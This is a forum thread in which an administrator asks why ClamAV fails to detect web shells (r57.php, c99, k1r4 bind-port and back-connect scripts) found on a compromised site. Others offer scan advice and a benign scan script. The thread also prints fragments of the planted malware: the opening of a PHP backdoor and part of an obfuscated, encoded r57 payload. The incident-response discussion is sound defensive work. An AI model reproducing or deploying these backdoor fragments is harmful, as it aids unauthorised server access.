clamav clamscan is not detecting r57.php or c99

questions

Verified User
Joined
Oct 24, 2009
Messages
144
# ls
400.shtml 401.shtml 403.shtml 404.shtml 500.shtml balls cgi-bin logo.gif index.html r57.php
# pwd
/usr/home/soylandor1/domains/somedomainn.org/public_html
# clamscan -i

----------- SCAN SUMMARY -----------
Known viruses: 1131677
Engine version: 0.97.3
Scanned directories: 1
Scanned files: 8
Infected files: 0
Data scanned: 0.12 MB
Data read: 0.06 MB (ratio 1.88:1)
Time: 5.256 sec (0 m 5 s)
# clamscan -i -r ./

----------- SCAN SUMMARY -----------
Known viruses: 1131677
Engine version: 0.97.3
Scanned directories: 3
Scanned files: 23
Infected files: 0
Data scanned: 0.14 MB
Data read: 0.07 MB (ratio 1.89:1)
Time: 5.226 sec (0 m 5 s)
#
# ls balls
bd.pl c99sh_backconn.661.pl c99sh_bindport.329.pl c99sh_bindport.941.pl k1r4_backconn.682.pl k1r4_bindport.119.pl k1r4_bindport.536.pl k1r4_bindport.893.pl k1r4_bindport.968.pl
c2.php c99sh_bindport.115.c c99sh_bindport.749.pl k1r4_backconn.409.pl k1r4_backconn.887.pl k1r4_bindport.493.pl k1r4_bindport.616.pl k1r4_bindport.939.pl
#
# cd balls
# clamscan -i -r ./

----------- SCAN SUMMARY -----------
Known viruses: 1131677
Engine version: 0.97.3
Scanned directories: 1
Scanned files: 12
Infected files: 0
Data scanned: 0.02 MB
Data read: 0.01 MB (ratio 2.00:1)
Time: 5.274 sec (0 m 5 s)
#
 
Last edited:
If you manage to make ClamAV to detect web shells, please let me know, as I've never ever before been able to find them with ClamAV.
 
Turn on verbose then so you can see exactly what its checking. I have no problem scanning for c99 on any of my servers.

Here is the shell script I run:

Code:
#!/bin/sh

clear
echo
echo "Starting update process..."
echo
freshclam -v
echo
echo "Done."
sleep 4
clear
echo
echo "Starting scan process...This may take several hours...please be patient."
echo
cd / && clamscan -ir --exclude-dir=^/usr/ports/security/clamav --exclude-dir=^/sys --exclude-dir=^/dev --exclude-dir=^/proc --detect-pua=no --max-filesize=15M --scan-mail=no --log=/var/log/clamav/scanlog.log 
echo
echo "Done."
echo
 
Last edited:
# clamscan -r -i -v
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/cgi-bin/.htaccess
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/cgi-bin/foo.sh
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/cgi-bin/bd.pl
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/400.shtml
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/401.shtml
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/403.shtml
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/404.shtml
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/500.shtml
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/hblogo9.gif
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/index.html
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/r57.php
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/bd.pl
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/c2.php
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.968.pl
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.493.pl
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.939.pl
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.119.pl
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.893.pl
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.616.pl
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.536.pl
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_backconn.887.pl
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_backconn.409.pl
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_backconn.682.pl

----------- SCAN SUMMARY -----------
Known viruses: 1131677
Engine version: 0.97.3
Scanned directories: 3
Scanned files: 23
Infected files: 0
Data scanned: 0.14 MB
Data read: 0.07 MB (ratio 1.89:1)
Time: 11.030 sec (0 m 11 s)
# cat ./balls/c2.php
<?php
// A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.com/ [3-15-2011]
// This code is public domain and may be used in part or in full for any legal purpose. I would still appreciate a mention though :).

function isLinux($path)
{
return (substr($path,0,1)=="/" ? true : false);
}
function getSlashDir($isLinux)

# cat r57.php
666
<?php /* WARNING: This file is protected encrypted via fud file no detecding. */
$o="QAFzOzh3b3cNKAAAVi0oBpAAMAAAFSckJwAQAFK/9wCAJwCSAFIAAAknBZ8AAAYnBGEAQQVxAEAAsSQDzwAABScCwf79CLMDkAAwAQMD3wAABScC0SQAUwB0BCED3wAABCcDFiQAEj
 
my ubuntu desktop scans with an OK at the end, but my FreeBSD server has no OK at the end, perhaps the hacker broke the server/clamav (I just installed clamav again last night on both server and desktop-ubuntu)


this is how my desktop looks when i scan with clamav:

admin1@admin1:~$ clamscan .
LibClamAV Warning: ***********************************************************
LibClamAV Warning: *** This version of the ClamAV engine is outdated. ***
LibClamAV Warning: *** DON'T PANIC! Read http://www.clamav.net/support/faq ***
LibClamAV Warning: ***********************************************************
LibClamAV Warning: ***********************************************************
LibClamAV Warning: *** This version of the ClamAV engine is outdated. ***
LibClamAV Warning: *** DON'T PANIC! Read http://www.clamav.net/support/faq ***
LibClamAV Warning: ***********************************************************
LibClamAV Warning: ***********************************************************
LibClamAV Warning: *** This version of the ClamAV engine is outdated. ***
LibClamAV Warning: *** DON'T PANIC! Read http://www.clamav.net/support/faq ***
LibClamAV Warning: ***********************************************************
./.dvdriprc: OK
./.recently-used: OK
./.openme.prefs: OK
./.dmrc: OK
./.odbc.ini: Empty file
./.DCP Builder: OK
./examples.desktop: OK
./.profile: OK
./.xsession-errors.old: OK
./.libquicktime_codecs: OK
./.printer-groups.xml: OK
./.sudo_as_admin_successful: Empty file
./.gtk-bookmarks: OK
./.ICEauthority: OK
./.esd_auth: OK
./.bash_logout: OK
./.bashrc: OK
./.bash_history: OK
./.gtk-recordmydesktop: OK
./clamscanlog.txt: OK
./.gksu.lock: Empty file
./.pulse-cookie: OK
./clipdat2.rdf: OK
./.ufrawrc: OK
./.xsession-errors: OK
./.recently-used.xbel: OK

----------- SCAN SUMMARY -----------
Known viruses: 1132278
Engine version: 0.96.5
Scanned directories: 1
Scanned files: 24
Infected files: 0
Data scanned: 1.69 MB
Data read: 0.91 MB (ratio 1.85:1)
Time: 4.835 sec (0 m 4 s)
 
They must not match any signature in the virus database or your database is out of sync. Update the defintions with freshclam. If not copy the files to your ubuntu and see if they are caught.
 
You can see that my server has more viruses and a newer version than my desktop. I've seen many other examples of clamscan catching c99 and r57 from other forums. Some people say it will some say it won't.
 
Back
Top